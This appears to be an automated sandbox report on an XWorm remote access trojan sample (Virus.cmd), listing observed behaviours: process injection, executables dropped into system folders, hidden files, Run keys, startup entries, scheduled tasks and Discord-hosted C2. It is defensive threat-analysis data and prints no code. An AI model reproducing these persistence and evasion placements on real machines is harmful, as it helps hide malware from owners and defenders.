Malware Analysis Report

2024-11-16 13:30

Sample ID 240621-vnb19aybkh
Target Virus.cmd
SHA256 d90f45a296a620f69256791f49a794451c83192cd8244600c3e26c5cd0e16e94
Tags
xworm evasion execution persistence rat trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

d90f45a296a620f69256791f49a794451c83192cd8244600c3e26c5cd0e16e94

Threat Level: Known bad

The file Virus.cmd was found to be: Known bad.

Malicious Activity Summary

xworm evasion execution persistence rat trojan

Xworm

Detect Xworm Payload

Suspicious use of NtCreateUserProcessOtherParentProcess

Blocklisted process makes network request

Sets file to hidden

Command and Scripting Interpreter: PowerShell

Downloads MZ/PE file

Executes dropped EXE

Drops startup file

Adds Run key to start application

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Drops file in System32 directory

Suspicious use of SetThreadContext

Drops file in Windows directory

Enumerates physical storage devices

Modifies data under HKEY_USERS

Suspicious use of AdjustPrivilegeToken

Modifies registry class

Scheduled Task/Job: Scheduled Task

Views/modifies file attributes

Checks SCSI registry key(s)

Suspicious use of SetWindowsHookEx

Suspicious use of WriteProcessMemory

Delays execution with timeout.exe

Suspicious use of UnmapMainImage

Uses Task Scheduler COM API

Suspicious use of SendNotifyMessage

Suspicious behavior: EnumeratesProcesses

Enumerates system info in registry

Suspicious use of FindShellTrayWindow

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-21 17:07

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-21 17:07

Reported

2024-06-21 17:10

Platform

win11-20240611-en

Max time kernel

145s

Max time network

153s

Command Line

winlogon.exe

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 2496 created 640 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\system32\winlogon.exe
PID 1616 created 640 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\system32\winlogon.exe

Xworm

trojan rat xworm

Downloads MZ/PE file

Sets file to hidden

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4Joex1.exe C:\Windows\SysWOW64\winrm\Microsoft\drivermapperJoex.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Malicious.exe C:\Windows\SysWOW64\winrm\Microsoft\drivermapperJoex.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4Malicious.lnk C:\ProgramData\x4V5.2.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4Malicious.lnk C:\ProgramData\x4V5.2.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4Joex1.lnk C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4Joex1.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4Joex1.lnk C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4Joex1.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Windows\CurrentVersion\Run\x4Joex1 = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\x4Joex1.exe" C:\Windows\SysWOW64\winrm\Microsoft\drivermapperJoex.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Windows\CurrentVersion\Run\Malicious = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Malicious.exe" C:\Windows\SysWOW64\winrm\Microsoft\drivermapperJoex.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Windows\CurrentVersion\Run\x4Malicious = "C:\\Users\\Admin\\x4Malicious" C:\ProgramData\x4V5.2.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Windows\CurrentVersion\Run\x4V5.2 = "C:\\ProgramData\\x4V5.2.exe" C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Malicious.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Windows\CurrentVersion\Run\x4Shellcode = "C:\\ProgramData\\x4Shellcode.exe" C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Malicious.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Windows\CurrentVersion\Run\x4Joex1 = "C:\\ProgramData\\x4Joex1.exe" C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4Joex1.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Windows\CurrentVersion\Run\x4V5.2 = "C:\\ProgramData\\x4V5.2.exe" C:\Windows\SysWOW64\winrm\Microsoft\Drivermapper.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Windows\CurrentVersion\Run\x4Shellcode = "C:\\ProgramData\\x4Shellcode.exe" C:\Windows\SysWOW64\winrm\Microsoft\Drivermapper.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A icanhazip.com N/A N/A
N/A ip-api.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Inventory.evtx C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\SysWOW64\winrm\Microsoft\DriverLocator.exe C:\Windows\system32\attrib.exe N/A
File opened for modification C:\Windows\SysWOW64\winrm\Microsoft\Drivermapper.exe C:\Windows\system32\attrib.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Steps-Recorder.evtx C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\x4Joex1 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\SysWOW64\winrm\Microsoft\drivermapperJoex.exe C:\Windows\system32\attrib.exe N/A
File opened for modification C:\Windows\System32\Tasks\x4Malicious C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\x4svc64 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Telemetry.evtx C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Troubleshooter.evtx C:\Windows\System32\svchost.exe N/A
File created C:\Windows\SysWOW64\winrm\Microsoft\Drivermapper.exe C:\Windows\system32\curl.exe N/A
File created C:\Windows\SysWOW64\winrm\Microsoft\drivermapperJoex.exe C:\Windows\system32\curl.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File created C:\Windows\SysWOW64\winrm\Microsoft\DriverLocator.exe C:\Windows\system32\curl.exe N/A
File opened for modification C:\Windows\System32\Tasks\Malicious C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2496 set thread context of 1100 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 1616 set thread context of 2080 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Panther\UnattendGC\diagerr.xml C:\Windows\ImmersiveControlPanel\SystemSettings.exe N/A
File opened for modification C:\Windows\Panther\UnattendGC\diagwrn.xml C:\Windows\ImmersiveControlPanel\SystemSettings.exe N/A
File opened for modification C:\Windows\Panther\UnattendGC\setupact.log C:\Windows\System32\oobe\UserOOBEBroker.exe N/A
File opened for modification C:\Windows\Panther\UnattendGC\setuperr.log C:\Windows\System32\oobe\UserOOBEBroker.exe N/A
File opened for modification C:\Windows\Panther\UnattendGC\diagerr.xml C:\Windows\System32\oobe\UserOOBEBroker.exe N/A
File opened for modification C:\Windows\Panther\UnattendGC\diagwrn.xml C:\Windows\System32\oobe\UserOOBEBroker.exe N/A
File opened for modification C:\Windows\Panther\UnattendGC\setupact.log C:\Windows\ImmersiveControlPanel\SystemSettings.exe N/A
File opened for modification C:\Windows\Panther\UnattendGC\setuperr.log C:\Windows\ImmersiveControlPanel\SystemSettings.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID C:\Windows\ImmersiveControlPanel\SystemSettings.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 C:\Windows\ImmersiveControlPanel\SystemSettings.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID C:\Windows\ImmersiveControlPanel\SystemSettings.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 C:\Windows\ImmersiveControlPanel\SystemSettings.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID C:\Windows\ImmersiveControlPanel\SystemSettings.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 C:\Windows\ImmersiveControlPanel\SystemSettings.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID C:\Windows\ImmersiveControlPanel\SystemSettings.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 C:\Windows\ImmersiveControlPanel\SystemSettings.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\system32\wbem\wmiprvse.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1718989760" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Fri, 21 Jun 2024 17:09:21 GMT" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\PersistedTitleBarData C:\Windows\system32\ApplicationFrameHost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\PersistedTitleBarData\windows.immersivecontrolpanel_cw5n1h2txye C:\Windows\system32\ApplicationFrameHost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\PersistedTitleBarData\windows.immersivecontrolpanel_cw5n1h2txye = "2814749767500776" C:\Windows\system32\ApplicationFrameHost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\SplashScreen C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\ApplicationFrame C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\ApplicationFrame\windows.immersivecontrolpanel_cw5n1h2txyewy!mi C:\Windows\Explorer.EXE N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\winrm\Microsoft\DriverLocator.exe N/A
N/A N/A C:\Windows\SysWOW64\winrm\Microsoft\DriverLocator.exe N/A
N/A N/A C:\Windows\SysWOW64\winrm\Microsoft\DriverLocator.exe N/A
N/A N/A C:\Windows\SysWOW64\winrm\Microsoft\DriverLocator.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SMAtMZpm.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SMAtMZpm.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SMAtMZpm.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SMAtMZpm.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\winrm\Microsoft\DriverLocator.exe N/A
